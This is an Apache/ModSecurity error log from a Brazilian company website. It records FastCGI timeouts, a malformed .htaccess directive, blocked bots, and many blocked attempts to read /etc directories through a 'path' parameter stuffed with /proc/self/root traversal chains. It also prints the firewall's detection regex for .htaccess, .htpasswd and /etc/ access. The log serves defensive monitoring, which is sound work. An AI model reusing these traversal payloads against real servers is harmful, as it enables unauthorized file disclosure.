[Wed Mar 18 01:17:59.057922 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34906] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:18:21.045810 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35248] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:18:43.131771 2026] [proxy_fcgi:error] [pid 29882:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35526] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:18:44.908325 2026] [core:alert] [pid 17887:tid 140411716749056] [client 74.7.243.128:36770] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/systemd/user
[Wed Mar 18 01:19:05.129804 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35726] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:19:25.715614 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:32794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abonzda6ubjKNq_cu4ZGtAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 01:19:27.125845 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36028] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:19:51.045844 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36302] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:19:58.233231 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:47400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abon7sdf6f5d65gmYZSA1QAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:20:10.758986 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:47400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abon-sdf6f5d65gmYZSA3QAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:20:12.141873 2026] [proxy_fcgi:error] [pid 11816:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36542] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:20:12.173244 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:34586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abon_OyqAr6etmhZHNpn-AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:20:12.721794 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.244.43:52726] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abon_NY0UrI5A3LftIxAmwAAAYo"]
[Wed Mar 18 01:20:12.729972 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:42514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abon_OoXxyEfFpUF8f8eTgAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:20:18.963563 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:42524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abooAvu8EFLIOrSqIpu5RgAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:20:34.156931 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36904] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:20:37.272433 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.228.61:44346] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abooFew_le52K8_3pV2Q1AAAAhQ"]
[Wed Mar 18 01:20:57.133795 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37160] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:21:19.133775 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:21:26.866076 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:46850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abooRgkwaGbbGflqUZDFBQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:21:41.121938 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37550] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:22:03.125827 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37832] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:22:25.129877 2026] [proxy_fcgi:error] [pid 11816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38056] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:22:31.387348 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:50528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abooh9Y0UrI5A3LftIxAxQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:22:48.133831 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38326] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:22:56.711226 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:43690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboooAkwaGbbGflqUZDFOQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:23:10.122073 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38610] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:23:27.138849 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.241.31:44728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboov-w_le52K8_3pV2REQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:23:32.045988 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38874] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:23:42.575183 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:51682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboozimAPhZkrhU8w4kgtgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:23:54.121780 2026] [proxy_fcgi:error] [pid 29882:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39078] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:24:02.810820 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:41990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboo4vu8EFLIOrSqIpu5iwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:24:07.711857 2026] [access_compat:error] [pid 17653:tid 140411565680384] [client 216.73.216.191:38102] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Wed Mar 18 01:24:16.045848 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39332] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:24:39.123845 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39614] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:25:01.149083 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39904] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:25:23.077813 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40210] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:25:24.657189 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.244.43:44986] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abopNNa6ubjKNq_cu4ZHNQAAA0s"]
[Wed Mar 18 01:25:45.029819 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40546] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:25:47.341170 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.228.61:42262] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abopSwkwaGbbGflqUZDFXAAAAME"]
[Wed Mar 18 01:26:07.125789 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40778] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:26:11.787820 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.241.31:38226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abopY-w_le52K8_3pV2RWwAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:26:29.041898 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41016] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:26:30.154484 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:50344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abopdvu8EFLIOrSqIpu5ugAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:26:51.125795 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41290] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:27:13.133853 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41526] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:27:18.344088 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:49552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboppuyqAr6etmhZHNpodAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:27:35.121804 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41760] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:27:58.101929 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42044] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:28:20.133789 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42304] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:28:42.125824 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42636] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:29:04.141326 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42914] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:29:25.149810 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:29:47.128157 2026] [proxy_fcgi:error] [pid 15051:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43420] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:30:09.146628 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43720] AH01075: Error dispatching request to : (polling)
